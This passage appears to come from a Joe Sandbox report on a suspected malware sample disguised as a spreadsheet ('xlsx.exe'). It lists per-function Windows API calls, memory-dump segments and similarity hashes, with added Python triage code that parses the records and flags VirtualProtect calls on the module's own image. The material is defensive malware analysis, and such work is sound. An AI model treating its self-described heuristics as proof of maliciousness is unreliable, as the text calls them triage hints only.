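        if key == "Source File":
            s = SOURCE_RE.match(value)
            if s:
                cur.dump, cur.base = s["dump"], int(s["base"], 16)
        elif key == "Associated":
            cur.fields.setdefault(key, []).append(value.removesuffix(LINK_RESIDUE).strip())
        else:
            cur.fields[key] = value
    return records

def positional_matches(a, b):
    """Hex digits equal at the same offset (constructed metric); 0 if lengths differ."""
    return sum(x == y for x, y in zip(a, b)) if len(a) == len(b) else 0

def direct_apis_by_base(records):
    """Image base -> sorted APIs called directly (subcall entries excluded)."""
    out = {}
    for r in records:
        out.setdefault(r.base, set()).update(a for a, _, _, caller in r.apis if caller is None)
    return {base: sorted(names) for base, names in out.items()}

# Constructed input: trimmed copies of five records from this report.
SAMPLE = r"""
Memory Dump Source
• Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• API ID:
• Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
Memory Dump Source
• Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID:
• Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
APIs
• SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
• WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
Memory Dump Source
• Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: File$PointerWrite
APIs
• GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FC3
  • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
• LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FD4
• FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 00402051
Memory Dump Source
• Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
APIs
Memory Dump Source
• Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• API ID: EnumErrorLastWindows
"""

RECORDS = parse_records(SAMPLE)

if __name__ == "__main__":
    for i, r in enumerate(RECORDS):
        print(i, hex(r.base), repr(r.fields.get("API ID", "")), [a for a, *_ in r.apis])
    print(positional_matches(RECORDS[0].fields["Instruction Fuzzy Hash"],
                             RECORDS[1].fields["Instruction Fuzzy Hash"]), "of 70 digits agree")
    print(direct_apis_by_base(RECORDS))
```

Run stand-alone it lists the five records, the API names each calls directly, and the 0x400000 / 0x10000000 split. The two API-less functions at the top of the listing agree at 58 of 70 hex digits of their instruction fuzzy hash under this positional comparison; the report itself does not say how the sandbox scores similarity, so treat that number as a triage hint for near-duplicate routines, not as a verdict.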
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                          • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                          • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                          • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                          • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                          • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                          • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID:
                                                          • API String ID: 849931509-0
                                                          • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                          • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                          • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                          • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                          • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                          • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                          • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                          • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                          • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                          • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                          APIs
                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                          • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                          • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
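The per-function records in this listing have a fixed shape: an "APIs" block of `Name.Module(args), ref: address` lines, a "Memory Dump Source" block naming the dumped segments and the module base ("Offset"), and a "Snapshot File" line. The following Python is an added example (not Joe Sandbox code or output) that parses records of that shape, indexes call sites by API, and flags `VirtualProtect` calls whose target address lies inside the calling module's own dumped image, as the 0x10000000 record directly above does (1000405C sits between the 10000000 base and the 10005000 segment). The sample input is copied from this listing with the interactive "Download File" labels removed; the image-span bound (highest listed segment plus one page) is an assumption, since the listing gives no segment sizes, and the "self-protect" rule is an analyst triage heuristic rather than a Joe Sandbox signature.

```python
"""Parse Joe Sandbox per-function records and flag VirtualProtect on the
module's own image.  Added example; assumes the record shape shown in the
listing (bullet lines, 'ref:' addresses, '.sdmp' segment names)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: two records copied from the listing, trimmed to the
# lines this parser consumes.  Raw string because of the backslash path.
SAMPLE = r"""APIs
• GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
Memory Dump Source
• Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
APIs
• VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
Memory Dump Source
• Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
"""

# 'Part of subcall function X:' lines and paren-less calls are tolerated.
API_RE = re.compile(
    r"^• (?:Part of subcall function [0-9A-F]+: )?(\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-F]+)$")
# The 4th dotted field of an .sdmp name is the segment's start address.
SRC_RE = re.compile(r"^• (?:Source File|Associated): (\S+?)\.sdmp(?:, Offset: ([0-9A-F]+))?")
SNAP_RE = re.compile(r"^• Snapshot File: (\S+)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]   # '?' marks an argument the sandbox could not recover
    ref: int                # call-site address


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    base: Optional[int] = None          # module base from 'Offset:'
    segments: List[int] = field(default_factory=list)
    snapshot: Optional[str] = None

    def image_span(self) -> Optional[Tuple[int, int]]:
        """Lower bound on the module's span: base up to one page past the
        highest listed segment start (assumption: sizes are not listed)."""
        if self.base is None or not self.segments:
            return None
        return self.base, max(self.segments) + 0x1000


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the listing on 'APIs' headers and collect each record's fields."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            api, mod, args, ref = m.groups()
            arglist = tuple(a for a in (args or "").split(",") if a)
            cur.calls.append(ApiCall(api, mod, arglist, int(ref, 16)))
            continue
        m = SRC_RE.match(line)
        if m:
            name, offset = m.groups()
            cur.segments.append(int(name.split(".")[3], 16))
            if offset:
                cur.base = int(offset, 16)
            continue
        m = SNAP_RE.match(line)
        if m:
            cur.snapshot = m.group(1)
    return records


def api_index(records: List[FunctionRecord]) -> Dict[str, List[int]]:
    """Map API name -> sorted call-site addresses across all records."""
    idx: Dict[str, List[int]] = {}
    for rec in records:
        for c in rec.calls:
            idx.setdefault(c.api, []).append(c.ref)
    return {k: sorted(v) for k, v in idx.items()}


def self_protect_calls(records: List[FunctionRecord]) -> List[Tuple[Optional[str], int, int]]:
    """(snapshot, call site, target) for VirtualProtect calls whose first
    argument lies inside the calling module's own image: a triage heuristic
    for in-place unpacking or self-modifying code, not a sandbox signature."""
    hits = []
    for rec in records:
        span = rec.image_span()
        if span is None:
            continue
        lo, hi = span
        for c in rec.calls:
            if c.api != "VirtualProtect" or not c.args:
                continue
            try:
                target = int(c.args[0], 16)
            except ValueError:
                continue            # unrecovered argument ('?')
            if lo <= target < hi:
                hits.append((rec.snapshot, c.ref, target))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for snap, ref, target in self_protect_calls(recs):
        print(f"{snap}: VirtualProtect at {ref:08X} targets own image {target:08X}")
```

Feeding the whole report text to `parse_records` works the same way; `api_index` then answers "which call sites touch ReadFile or SetFilePointer" without scrolling the listing, and any `self_protect_calls` hit is a function worth opening first in the dump.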
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                          • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                          • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                          • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                          • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                          • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                          • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                          • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                          • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                          • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
